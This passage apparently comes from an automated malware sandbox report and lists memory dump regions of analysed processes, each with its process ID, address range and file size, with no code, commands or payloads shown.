                                                                                                                            • memory/4992-144-0x0000000000401000-0x00000000004B7000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              728KB

                                                                                                                            • memory/5036-160-0x0000000000800000-0x0000000000801000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                            • memory/5084-168-0x0000000000401000-0x00000000004A9000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              672KB

                                                                                                                            • memory/5096-278-0x00000000716E0000-0x0000000071DCE000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              6.9MB

                                                                                                                            • memory/5096-281-0x0000000000930000-0x0000000000931000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                            • memory/5096-289-0x00000000051C0000-0x00000000051C1000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                            • memory/5096-306-0x0000000005250000-0x0000000005251000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                            • memory/5096-296-0x0000000004B60000-0x0000000004B94000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              208KB

                                                                                                                            • memory/5096-302-0x0000000004BE0000-0x0000000004BE1000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                            • memory/5180-345-0x0000000008F20000-0x0000000008F53000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              204KB

                                                                                                                            • memory/5180-285-0x00000000069B2000-0x00000000069B3000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                            • memory/5180-360-0x0000000008C30000-0x0000000008C31000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                            • memory/5180-358-0x0000000008C40000-0x0000000008C41000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                            • memory/5180-357-0x00000000069B3000-0x00000000069B4000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                            • memory/5180-355-0x0000000009210000-0x0000000009211000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                            • memory/5180-352-0x0000000008030000-0x0000000008031000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                            • memory/5180-287-0x00000000069B0000-0x00000000069B1000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                            • memory/5180-353-0x000000007E7D0000-0x000000007E7D1000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                            • memory/5180-354-0x0000000009050000-0x0000000009051000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                            • memory/5180-276-0x00000000716E0000-0x0000000071DCE000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              6.9MB

                                                                                                                            • memory/5232-238-0x0000000000650000-0x0000000000651000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                            • memory/5232-240-0x0000000002550000-0x0000000002580000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              192KB

                                                                                                                            • memory/5232-233-0x00007FFC7EB90000-0x00007FFC7F57C000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              9.9MB

                                                                                                                            • memory/5232-254-0x0000000002540000-0x0000000002542000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              8KB

                                                                                                                            • memory/5240-370-0x0000000000400000-0x0000000000492000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              584KB

                                                                                                                            • memory/5240-371-0x0000000000400000-0x0000000000492000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              584KB

                                                                                                                            • memory/5328-443-0x00000000058D0000-0x00000000058D1000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                            • memory/5328-435-0x00000000716E0000-0x0000000071DCE000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              6.9MB

                                                                                                                            • memory/5488-413-0x0000000000400000-0x00000000015D7000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              17.8MB

                                                                                                                            • memory/5488-412-0x00000000001D0000-0x00000000001D1000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                            • memory/5488-414-0x00000000000E0000-0x00000000000E1000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                            • memory/5560-305-0x0000000004DF0000-0x0000000004DF1000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                            • memory/5560-307-0x0000000004E50000-0x0000000004E51000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                            • memory/5560-304-0x0000000004DA0000-0x0000000004DDB000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              236KB

                                                                                                                            • memory/5560-295-0x0000000002780000-0x0000000002781000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                            • memory/5560-286-0x00000000716E0000-0x0000000071DCE000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              6.9MB

                                                                                                                            • memory/5560-291-0x00000000005E0000-0x00000000005E1000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                            • memory/5592-431-0x0000000003FF0000-0x0000000003FF1000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                            • memory/5660-312-0x00000000716E0000-0x0000000071DCE000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              6.9MB

                                                                                                                            • memory/5660-389-0x00000000030E1000-0x00000000030E2000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                            • memory/5660-311-0x0000000000400000-0x0000000000426000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              152KB

                                                                                                                            • memory/5660-343-0x00000000030E0000-0x00000000030E1000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                            • memory/5688-327-0x000002142F860000-0x000002142F861000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                            • memory/5688-328-0x000002142F860000-0x000002142F861000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                            • memory/6096-444-0x0000000000CC0000-0x0000000000CC1000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                            • memory/6112-273-0x0000000003771000-0x000000000379C000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/6112-269-0x0000000002171000-0x0000000002175000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              16KB

                                                                                                                            • memory/6112-274-0x00000000037B1000-0x00000000037B8000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              28KB

                                                                                                                            • memory/6112-272-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                            • memory/6140-271-0x0000000001810000-0x0000000001812000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              8KB

                                                                                                                            • memory/6140-268-0x0000000003060000-0x0000000003A00000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              9.6MB

                                                                                                                            • memory/6336-430-0x00000000345C1000-0x00000000345FF000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              248KB

                                                                                                                            • memory/6336-423-0x0000000000400000-0x00000000015D7000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              17.8MB

                                                                                                                            • memory/6336-425-0x0000000033D21000-0x0000000033EA0000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              1.5MB

                                                                                                                            • memory/6336-429-0x0000000034461000-0x000000003454A000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              932KB

                                                                                                                            • memory/6336-422-0x00000000019C0000-0x00000000019C1000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                            • memory/6524-405-0x0000000000400000-0x0000000000C77000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              8.5MB

                                                                                                                            • memory/6524-404-0x00000000039A0000-0x00000000039A1000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              4KB

                                                                                                                            • memory/6524-406-0x00000000039A0000-0x00000000041FD000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              8.4MB

                                                                                                                            • memory/6524-408-0x0000000000400000-0x0000000000C77000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              8.5MB

                                                                                                                            • memory/6912-448-0x0000000000400000-0x0000000000897000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              4.6MB